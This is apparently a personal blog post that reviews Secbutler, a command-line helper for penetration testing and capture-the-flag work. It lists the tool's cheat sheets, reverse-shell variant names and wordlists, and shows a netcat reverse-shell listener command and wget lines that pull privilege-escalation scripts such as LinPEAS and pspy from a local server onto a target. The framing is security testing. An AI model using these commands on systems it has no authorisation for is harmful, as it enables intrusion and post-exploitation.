Secbutler is cool tool to have in your toolbox when doing fun stuff like Pentesting, CTF or just having fun. Cheatsheets, listeners, revshells and more.

Hi!

Link to tool:

https://github.com/groundsec/secbutler

Exploring Secbutler: A CLI-Based Security Tool

I recently stumbled upon a gem in the realm of cybersecurity tools – Secbutler from Groundsec. In a world saturated with graphical interfaces and web-based platforms, Secbutler caught my attention for its command-line interface (CLI) approach. Now, you might be wondering, why make an exception for yet another tool? Well, let me share my philosophy with you.

I firmly believe in the power of hands-on learning – the idea that you truly understand and remember something when you take the reins and type out your commands. It’s a philosophy that has served me well over the years. Not every tool is readily available in every situation, and navigating a myriad of plugins or a GUI interface can sometimes feel like a detour from the essence of understanding.

Secbutler, however, is different. It embraces the simplicity and efficiency of the command line, eschewing the need for plugins or a fancy graphical user interface. In a world where point-and-click often dominates, Secbutler stands out as a testament to the elegance of simplicity.

So, why did I make an exception for Secbutler? Join me on this exploration as we delve into the world of this CLI-based security tool, unraveling its features, benefits, and perhaps uncovering the beauty of a tool that requires nothing more than a keyboard and a command prompt. Let’s embark on a journey where learning and efficiency converge, and where the command line takes center stage.

Installing

Just follow the guide that is on the github page or follow me here

go install github.com/groundsec/secbutler@latest

Easy right?

Run it

/home/roger/go/bin/secbutler -h

cheatsheet

Will download PayloadAllTheThings and then present the cheatsheets in cli

All the cheatcheets that are accesible from cli and offline also

Account Takeover
API Key Leaks
Argument Injection
AWS Amazon Bucket S3
Business Logic Errors
CICD
Clickjacking
Command Injection
CONTRIBUTING.md
CORS Misconfiguration
CRLF Injection
CSRF Injection
CSV Injection
custom.css
CVE Exploits
Dependency Confusion
Directory Traversal
DNS Rebinding
Dom Clobbering
File Inclusion
Google Web Toolkit
GraphQL Injection
Hidden Parameters
HTTP Parameter Pollution
Insecure Deserialization
Insecure Direct Object References
Insecure Management Interface
Insecure Randomness
Insecure Source Code Management
Java RMI
JSON Web Token
Kubernetes
LaTeX Injection
LDAP Injection
_LEARNING_AND_SOCIALS
LICENSE
Mass Assignment
Methodology and Resources
mkdocs.yml
NoSQL Injection
OAuth Misconfiguration
Open Redirect
Prompt Injection
Prototype Pollution
Race Condition
README.md
Request Smuggling
SAML Injection
Server Side Include Injection
Server Side Request Forgery
Server Side Template Injection
SQL Injection
Tabnabbing
_template_vuln
Type Juggling
Upload Insecure Files
Web Cache Deception
Web Sockets
XPATH Injection
XSLT Injection
XSS Injection
XXE Injection

example in this case AWS Amazon Bucket S3

listener

Obtain the command to start a reverse shell listener

In this case create me a rlwrap + nc listner on port 9001

rlwrap -cAr nc -lvnp 9001

payloads

Obtain and serve common payloads. This will download some stuff and present the as links to click on.

Here are the payloads that are availble today
LinPEAS (linpeas.sh)
wget http://192.168.3.5:4242/linpeas.sh

WinPEAS (winPEASany.exe)
wget http://192.168.3.5:4242/winPEASany.exe

Linux Smart Enumeration (lse.sh)
wget http://192.168.3.5:4242/lse.sh

pspy 32bit static version (pspy32)
wget http://192.168.3.5:4242/pspy32

pspy 64bit static version (pspy64)
wget http://192.168.3.5:4242/pspy64

pspy 32bit small version (pspy32s)
wget http://192.168.3.5:4242/pspy32s

pspy 64bit small version (pspy64s)
wget http://192.168.3.5:4242/pspy64s

Linux Exploit Suggester (les.sh)
wget http://192.168.3.5:4242/les.sh

LinEnum (LinEnum.sh)
wget http://192.168.3.5:4242/LinEnum.sh

Enumy32 (enumy32)
wget http://192.168.3.5:4242/enumy32

Enumy64 (enumy64)
wget http://192.168.3.5:4242/enumy64

truffleproc (truffleproc.sh)
wget http://192.168.3.5:4242/truffleproc.sh

proxy

Obtain a random proxy from FreeProxy

If you for some reason want to use a free proxy to do stuff, below ip is not my ip adress 🙂

revshell

Obtain the command for a reverse shell
How to create a reverse shell on Linux Windows or Mac

In this case a powershell rev shel for powershell

Linux have these

Bash -i
Bash 196
Bash read line
Bash 5
Bash UDP
nc mkfifo
nc -e
BusyBox nc -e
nc -c
ncat -e
ncat udp
curl
rustcat
C
C# TCP Client
C# Bash -i
Haskell #1
Perl
Perl no sh
Perl PentestMonkey
PHP PentestMonkey
PHP cmd
PHP cmd 2
PHP cmd small
PHP exec
PHP shell_exec
PHP system
PHP passtru
PHP`
PHP popen
PHP proc_open
Python #1
Python #2
Python3 #1
Python3 #2
Python3 shortest
Ruby #1
Ruby no sh
socat #1
socat #2 (TTY)
sqlite3 nc mkfifo
node.js
node.js #2
Java #1
Java #2
Java #3
Java Web
Java Two Way
Javascript
telnet
zsh
Lua #1
Lua #2
Golang
Vlang
Awk
Dart
Crystal (system)
Crystal (code)

Windows have these

PHP PentestMonkey
PHP cmd
PHP cmd 2
PHP cmd small
PHP system
PHP`
PHP popen
PHP proc_open
node.js #2
Java #3
Java Web
Java Two Way
Javascript
Lua #2
Golang
Dart
Crystal (system)
nc.exe
ncat.exe
C Windows
C# TCP Client
C# Bash -i
Windows ConPty
PowerShell #1
PowerShell #2
PowerShell #3
PowerShell #4 (TLS)
PowerShell #3 (Base64)
Python3 Windows
Groovy

Mac has these

Bash -i
Bash 196
Bash read line
Bash 5
Bash UDP
nc mkfifo
nc -e
nc -c
ncat -e
ncat udp
curl
rustcat
C
Haskell #1
Perl
Perl no sh
Perl PentestMonkey
PHP PentestMonkey
PHP cmd
PHP cmd 2
PHP cmd small
PHP exec
PHP shell_exec
PHP system
PHP passtru
PHP`
PHP popen
PHP proc_open
Python #1
Python #2
Python3 #1
Python3 #2
Ruby #1
Ruby no sh
socat #1
socat #2 (TTY)
sqlite3 nc mkfifo
node.js
node.js #2
Java #1
Java #2
Java #3
Java Web
Java Two Way
Javascript
telnet
zsh
Golang
Vlang
Awk
Dart
Crystal (system)
Crystal (code)

tools

Generate a install script for the most common cybersecurity tools

If you want to create script to install other tools this can be handy. Be careful, are you sure that you want to install. There is support for alot of tools so I will just show a handfull.

/home/roger/go/bin/secbutler tools

This will create a script that you can use to install tools

Be careful as I said, some tools installation can break other tools if you do not install them manually. That why we are running maskine virtual! 🙂

wordlists

Generate a download script for the most common wordlists

Download the “main” wordlist out there!

This will create a script that puts all wordlist in /usr/share/wordlists/

Nice so you do not forget a wordlist when you hacking stuff!

Install SecLists

info “Installing SecLists”
git clone –depth 1 https://github.com/danielmiessler/SecLists.git /usr/share/wordlists/SecLists &> /dev/null

# Install samlists
info “Installing samlists”
git clone –depth 1 https://github.com/the-xentropy/samlists.git /usr/share/wordlists/samlists &> /dev/null

# Install PayloadsAllTheThings
info “Installing PayloadsAllTheThings”
git clone –depth 1 https://github.com/swisskyrepo/PayloadsAllTheThings.git /usr/share/wordlists/PayloadsAllTheThings &> /dev/null

# Install fuzzdb
info “Installing fuzzdb”
git clone –depth 1 https://github.com/fuzzdb-project/fuzzdb.git /usr/share/wordlists/fuzzdb &> /dev/null

# Install fuzz.txt
info “Installing fuzz.txt”
git clone –depth 1 https://github.com/Bo0oM/fuzz.txt.git /usr/share/wordlists/fuzz.txt &> /dev/null

# Install Assetnote
info “Installing Assetnote”
wget -r –no-parent -R “index.html*” https://wordlists-cdn.assetnote.io/data/ -nH -e robots=off -P /usr/share/wordlists/Assetnote/ -nd &> /dev/null

Conclusion

So, the next time you find yourself in front of the TV, navigating through the melodramatic twists and turns of a Friday night “love show,” consider reaching for Secbutler. Let its simplicity be a reminder that even in the world of cybersecurity, elegance can be found in the unlikeliest of places. Here’s to securing not just our digital domains but also our downtime, one command at a time. Cheers to uncomplicated cybersecurity, even in the face of unimportant TV drama!

Thats all!

Keep hacking

//Roger

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Blog at WordPress.com.

Up ↑